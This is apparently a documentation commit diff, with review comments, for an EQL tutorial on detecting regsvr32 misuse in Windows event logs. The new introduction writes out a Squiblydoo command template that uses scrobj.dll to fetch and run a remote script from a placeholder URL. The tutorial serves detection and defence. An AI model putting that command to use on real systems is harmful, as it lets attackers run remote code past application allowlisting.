* [DOCS] EQL: Improve regsvr32 misuse explanation (#62722) Expands the introduction to better explain what regsvr32 misuse is and how it works at a high level. * [DOCS] EQL: Style fixes
This commit is contained in:
parent
9bf0d9105a
commit
00bfc2d684
|
@ -6,23 +6,37 @@
|
||||||
experimental::[]
|
experimental::[]
|
||||||
|
|
||||||
This example tutorial shows you how you can use EQL to detect security threats
|
This example tutorial shows you how you can use EQL to detect security threats
|
||||||
and other suspicious behavior.
|
and other suspicious behavior. In the scenario, you're tasked with detecting
|
||||||
|
https://attack.mitre.org/techniques/T1218/010/[regsvr32 misuse] in Windows
|
||||||
|
event logs.
|
||||||
|
|
||||||
In the scenario, you're tasked with detecting
|
`regsvr32.exe` is a built-in command-line utility used to register `.dll`
|
||||||
https://attack.mitre.org/techniques/T1218/010/[`regsvr32` misuse] in Windows event
|
libraries in Windows. As a native tool, `regsvr32.exe` has a trusted status in
|
||||||
logs. `regsvr32` misuse is a known adversary technique documented in the
|
Windows, letting it bypass most allowlist software and script blockers.
|
||||||
https://attack.mitre.org[MITRE ATT&CK®] knowledge base.
|
Attackers with access to a user's command line can use `regsvr32.exe` to run
|
||||||
|
malicious scripts using `.dll` libraries, even on machines that otherwise
|
||||||
|
disallow such scripts.
|
||||||
|
|
||||||
|
One common variant of regsvr32 misuse is a
|
||||||
|
https://attack.mitre.org/techniques/T1218/010/[Squiblydoo attack]. In a
|
||||||
|
Squiblydoo attack, a `regsvr32.exe` command uses the `scrobj.dll` library to
|
||||||
|
register and run a remote script. These commands often look like this:
|
||||||
|
|
||||||
|
[source,sh]
|
||||||
|
----
|
||||||
|
"regsvr32.exe /s /u /i:<script-url> scrobj.dll"
|
||||||
|
----
|
||||||
|
|
||||||
[discrete]
|
[discrete]
|
||||||
[[eql-ex-threat-detection-setup]]
|
[[eql-ex-threat-detection-setup]]
|
||||||
=== Setup
|
=== Setup
|
||||||
|
|
||||||
This tutorial uses a test dataset for `regsvr32` misuse from
|
This tutorial uses a test dataset for regsvr32 misuse from
|
||||||
https://github.com/redcanaryco/atomic-red-team[Atomic Red Team]. The dataset has
|
https://github.com/redcanaryco/atomic-red-team[Atomic Red Team]. The dataset has
|
||||||
been normalized and mapped to use fields from the {ecs-ref}[Elastic Common
|
been normalized and mapped to use fields from the {ecs-ref}[Elastic Common
|
||||||
Schema (ECS)], including the `@timestamp` and `event.category` fields. The
|
Schema (ECS)], including the `@timestamp` and `event.category` fields. The
|
||||||
dataset includes events that imitate behaviors related to `regsvr32` misuse, as
|
dataset includes events that imitate behaviors of a Squiblydoo attack, as
|
||||||
documented by MITRE ATT&CK®.
|
documented by the https://attack.mitre.org[MITRE ATT&CK®] knowledge base.
|
||||||
|
|
||||||
To get started, download and index the dataset:
|
To get started, download and index the dataset:
|
||||||
|
|
||||||
|
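Review bot: the Squiblydoo command on the new `[source,sh]` line is wrapped in literal double quotes, `"regsvr32.exe /s /u /i:<script-url> scrobj.dll"`, so a reader who copies it gets one quoted token rather than a command; drop the quotes, and the `sh` label is odd for a Windows command line. In the new intro paragraph, "run malicious scripts using `.dll` libraries" blurs the mechanism that the example itself shows: the script is a remote scriptlet fetched from `<script-url>`, and `scrobj.dll` is only the host that executes it, so the sentence should say that the DLL is used as a script host rather than that scripts are run "using `.dll` libraries". "letting it bypass most allowlist software and script blockers" is also an absolute claim with nothing on the page backing it; hedge it ("may not be flagged by application control" or similar).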
@ -58,9 +72,9 @@ yellow open my-index-000001 150
|
||||||
|
|
||||||
[discrete]
|
[discrete]
|
||||||
[[eql-ex-get-a-count-of-regsvr32-events]]
|
[[eql-ex-get-a-count-of-regsvr32-events]]
|
||||||
=== Get a count of `regsvr32` events
|
=== Get a count of regsvr32 events
|
||||||
|
|
||||||
Since you're looking for `regsvr32` misuse, start by getting a count of any
|
Since you're looking for regsvr32 misuse, start by getting a count of any
|
||||||
events associated with a `regsvr32.exe` process.
|
events associated with a `regsvr32.exe` process.
|
||||||
|
|
||||||
The following <<eql-search-api,EQL search API>> request uses an EQL query to
|
The following <<eql-search-api,EQL search API>> request uses an EQL query to
|
||||||
|
@ -112,11 +126,11 @@ query.
|
||||||
[[eql-ex-check-for-command-line-artifacts]]
|
[[eql-ex-check-for-command-line-artifacts]]
|
||||||
=== Check for command line artifacts
|
=== Check for command line artifacts
|
||||||
|
|
||||||
Based on your previous query, you know `regsvr32` processes were associated with
|
Based on your previous query, you know regsvr32 processes were associated with
|
||||||
143 events. But how was `regsvr32.exe` first called? And who called it?
|
143 events. But how was `regsvr32.exe` first called? And who called it?
|
||||||
|
|
||||||
`regsvr32` is a command-line utility so it may help to narrow your results to
|
`regsvr32.exe` is a command-line utility so it may help to narrow your results
|
||||||
processes where the command line was used.
|
to processes where the command line was used.
|
||||||
|
|
||||||
Update the previous EQL query as follows:
|
Update the previous EQL query as follows:
|
||||||
|
|
||||||
|
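Review bot: "narrow your results to processes where the command line was used" is vague about what the query actually filters on; since the following section reads the `process.command_line` field from the response, say that the query keeps only events where `process.command_line` is populated (or whatever condition the updated query uses). Also "regsvr32 processes were associated with 143 events" uses the bare name for the process while the next line says "`regsvr32.exe`"; the rest of the doc uses bare regsvr32 for the technique and code-font `regsvr32.exe` for the binary, so this should be `regsvr32.exe` processes.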
@ -144,8 +158,7 @@ The query matches one process event. The event has an `event.type` of
|
||||||
|
|
||||||
Based on the `process.command_line` value in the response, `regsvr32.exe` used
|
Based on the `process.command_line` value in the response, `regsvr32.exe` used
|
||||||
`scrobj.dll` to register a script, `RegSvr32.sct`. This fits the behavior of a
|
`scrobj.dll` to register a script, `RegSvr32.sct`. This fits the behavior of a
|
||||||
https://attack.mitre.org/techniques/T1218/010/["Squiblydoo" attack], a known
|
Squiblydoo attack.
|
||||||
variant of `regsvr32` misuse.
|
|
||||||
|
|
||||||
The response also includes other valuable information about how the
|
The response also includes other valuable information about how the
|
||||||
`regsvr32.exe` process started, such as the `@timestamp`, the associated
|
`regsvr32.exe` process started, such as the `@timestamp`, the associated
|
||||||
|
|
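Review bot: dropping the ATT&CK link and "a known variant of `regsvr32` misuse" leaves "This fits the behavior of a Squiblydoo attack." with no pointer for a reader who jumps straight to this step; since the term is now defined only in the introduction, add a cross-reference to that section (the doc already uses `<<...>>` anchors such as `<<eql-search-api,EQL search API>>`) or keep the link. The sentence could also state the observable that makes it a match: `scrobj.dll` as the DLL argument together with the `RegSvr32.sct` script passed via `/i:`, mirroring the command line given in the intro.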